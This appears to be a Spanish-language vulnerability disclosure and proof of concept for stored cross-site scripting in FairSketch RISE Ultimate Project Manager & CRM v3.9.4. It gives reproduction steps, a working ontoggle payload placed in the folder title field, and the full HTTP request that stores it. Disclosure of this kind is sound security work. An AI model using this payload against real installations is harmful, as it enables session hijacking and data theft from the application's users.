
Prueba de concepto para una vulnerabilidad XSS almacenado en FairSketch RISE Ultimate Project Manager & CRM v3.9.4, que demuestra la ejecución arbitraria de JavaScript mediante la inyección en el título de la carpeta.
Se descubrió una vulnerabilidad de Cross Site Scripting (XSS) almacenado en FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) en la funcionalidad del Administrador de archivos. La vulnerabilidad reside en el parámetro title que se envía al crear nuevas carpetas. Debido a una sanitización insuficiente de las entradas, un atacante puede inyectar payloads HTML/JavaScript (por ejemplo, <details/open/ontoggle=prompt(origin)>). El payload se almacena en el nombre de la carpeta y se ejecuta al listar las carpetas en el Administrador de archivos, lo que permite la ejecución arbitraria de JavaScript en el navegador de cualquier usuario que vea la carpeta afectada. Esto puede resultar en el secuestro de sesión y la exfiltración de datos.
[!NOTE]
Esta vulnerabilidad no es exclusiva de las cuentas de administrador. Puede explotarse con cualquier cuenta de usuario que tenga permiso para crear nuevas carpetas en el Administrador de archivos.
Inicie sesión con credenciales válidas.
Navegue a Files

Haga clic en New Folder

Introduzca el siguiente payload en el campo Title:
<details/open/ontoggle=prompt(origin)>


POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E